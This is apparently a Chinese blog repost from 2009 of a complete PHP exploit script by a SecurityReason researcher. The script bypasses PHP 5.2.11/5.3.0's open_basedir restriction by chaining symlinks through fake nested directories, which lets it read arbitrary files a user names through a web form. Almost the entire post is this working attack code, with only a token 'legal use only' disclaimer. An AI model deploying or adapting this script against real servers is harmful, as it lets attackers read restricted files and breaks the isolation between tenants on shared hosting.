PHP 5.2.11/5.3.0 的多个漏洞
2009年11月19日 |
利用代码:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 |
<?php /* PHP 5.2.11/5.3.0 symlink() open_basedir bypass by Maksymilian Arciemowicz http://securityreason.com/ cxib [ a.T] securityreason [ d0t] com CHUJWAMWMUZG */ $fakedir="cx"; $fakedep=16; $num=0; // offset of symlink.$num if(!empty($_GET['file'])) $file=$_GET['file']; else if(!empty($_POST['file'])) $file=$_POST['file']; else $file=""; echo '<PRE><img src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit from <a href="http://securityreason.com/" title="Security Audit PHP">Security Audit Lab - SecurityReason</a> labs. Author : Maksymilian Arciemowicz <p>Script for legal use only. <p>PHP 5.2.11 5.3.0 symlink open_basedir bypass <p>More: <a href="http://securityreason.com/">SecurityReason</a> <p><form name="form" action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF "]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>'; if(empty($file)) exit; if(!is_writable(".")) die("not writable directory"); $level=0; for($as=0;$as<$fakedep;$as++){ if(!file_exists($fakedir)) mkdir($fakedir); chdir($fakedir); } while(1<$as--) chdir(".."); $hardstyle = explode("/", $file); for($a=0;$a<count($hardstyle);$a++){ if(!empty($hardstyle[$a])){ if(!file_exists($hardstyle[$a])) mkdir($hardstyle[$a]); chdir($hardstyle[$a]); $as++; } } $as++; while($as--) chdir(".."); @rmdir("fakesymlink"); @unlink("fakesymlink"); @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink"); // this loop will skip allready created symlinks. while(1) if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break; else $num++; @unlink("fakesymlink"); mkdir("fakesymlink"); die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>'); ?> |
没有评论
暂无评论
RSS feed for comments on this post.
对不起,该文章的评论被关闭了!